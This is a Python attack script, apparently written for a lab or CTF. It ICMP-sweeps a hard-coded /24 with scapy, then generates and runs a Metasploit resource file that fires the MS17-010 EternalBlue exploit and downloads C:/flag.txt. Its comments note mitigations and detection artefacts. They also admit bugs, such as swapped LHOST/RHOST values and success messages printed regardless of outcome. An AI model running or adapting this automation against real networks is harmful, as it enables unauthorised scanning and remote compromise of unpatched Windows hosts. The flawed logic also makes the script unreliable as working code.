import os
import ipaddress
import queue
import socket
import threading
import random
from scapy.layers.inet import IP,ICMP,sr1
# q  : candidate addresses, filled by get_ip() and drained by host_Scanner().
# q2 : addresses that answered the ICMP probe, filled by host_Scanner() and
#      drained by main().
q, q2 = queue.Queue(), queue.Queue()

# Value written as LPORT by main(); main() adds 5 to it after every run.
port = 1000
def get_ip(host):
    """Put every host address of the network *host* onto the global queue ``q``.

    *host* is parsed by ``ipaddress.ip_network`` (the caller in this file
    passes a CIDR string). Each address is queued as a string.
    """
    for address in ipaddress.ip_network(host).hosts():
        q.put(str(address))
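def host_Scanner():
    """Worker loop: take addresses from ``q`` and queue the responsive ones on ``q2``.

    For each address one ICMP packet (scapy's default ``ICMP()`` layer, i.e.
    an echo request) is sent with ``sr1`` and a 3 second timeout. Any reply
    causes the address to be put on ``q2``.

    Detection note: the payload is the UTF-8 text of a Python list of ten
    random integers (for example ``[12, 200, 7, ...]``), so it is printable
    ASCII that starts with ``[`` and varies in length. That does not match
    the fixed ping payloads of common operating systems, and a sweep of a
    whole /24 from one source within seconds is visible in flow data.
    """
    while True:
        try:
            # get_nowait() makes "is there work?" and "take it" one atomic
            # step. With a separate empty() check followed by a blocking
            # get(), a worker that lost the race for the last item waited
            # forever, and the join() on the worker threads never returned.
            ip = q.get_nowait()
        except queue.Empty:
            break
        payload = bytes(
            str([random.randint(0, 255) for _ in range(10)]),
            encoding='utf-8',
        )
        probe = IP(dst=ip) / ICMP() / payload
        reply = sr1(probe, verbose=False, timeout=3)
        if reply:
            q2.put(ip)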
def Handler(configFile, lhost, lport, rhost):
    """Write the Metasploit resource script lines to *configFile*.

    Args:
        configFile: writable text file object; receives one ``write`` per line.
        lhost: value written after ``set LHOST``.
        lport: value written after ``set LPORT``.
        rhost: value written after ``set RHOST``.

    The three values are converted with ``str()`` and interpolated without
    validation, so a value containing a newline would add extra lines to the
    script. The callers in this file pass only literals and strings produced
    by ``ipaddress``.

    Defensive context: the module selected on the first line is the one for
    MS17-010 (SMBv1). The standard mitigations are the MS17-010 security
    update, disabling SMBv1, and filtering TCP 445 between network segments.
    The ``C:/flag.txt`` path suggests a lab or CTF target -- presumably;
    confirm against the environment the script was written for.
    """
    script_lines = (
        'use exploit/windows/smb/ms17_010_eternalblue\n',
        f'set LPORT {lport!s}\n',
        f'set LHOST {lhost!s}\n',
        f'set RHOST {rhost!s}\n',
        'exploit\n',
        'download C:/flag.txt ./\n',
        'exit\n',
    )
    for line in script_lines:
        configFile.write(line)
def main():
    """Write ``ms17_010.rc`` for one address from ``q2`` and run msfconsole on it.

    Returns immediately when ``q2`` is empty. Otherwise the resource file is
    (re)created in the current working directory, filled by ``Handler`` and
    passed to ``msfconsole -r`` through ``os.system``. Afterwards the global
    ``port`` is increased by 5.

    As written, the address taken from ``q2`` is passed as ``lhost`` and the
    fixed literal as ``rhost``.

    NOTE(review): the status line is printed unconditionally once
    ``os.system`` returns; its return code is not inspected, so the message
    is not evidence that the host is affected.
    NOTE(review): ``port`` is read and updated without a lock while this
    function runs on two threads, and both threads write the same file name.

    Host artefacts for responders: a file named ``ms17_010.rc`` in the
    working directory and a child process whose command line is
    ``msfconsole -r ms17_010.rc``.
    """
    global port
    if q2.empty():
        return
    # The file is opened (and truncated) before the queue is read, as in the
    # original statement order.
    rc_handle = open('ms17_010.rc', 'w')
    queued_addr = q2.get()
    port_text = str(port)
    fixed_addr = '192.168.201.169'
    Handler(rc_handle, queued_addr, port_text, fixed_addr)
    rc_handle.close()
    os.system('msfconsole -r ms17_010.rc')
    print(f'[+] ip=>{queued_addr} is open ms17_010')
    port = port + 5
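if __name__ == '__main__':
    # ip.txt is created (or truncated) here, but nothing in this file writes
    # to it. The with-block keeps that side effect and closes the handle
    # instead of leaving it open for the life of the process.
    with open('ip.txt', 'w'):
        pass

    # Queue every host address of the hard-coded /24.
    get_ip('192.168.201.0/24')

    # 50 probe workers drain q; wait for all of them so that q2 is complete
    # before the second stage starts.
    workers = []
    for _ in range(50):
        worker = threading.Thread(target=host_Scanner)
        worker.start()
        workers.append(worker)
    for worker in workers:
        worker.join()

    # Two threads each run main() once, so at most two addresses from q2 are
    # processed per invocation of the script.
    for _ in range(2):
        threading.Thread(target=main).start()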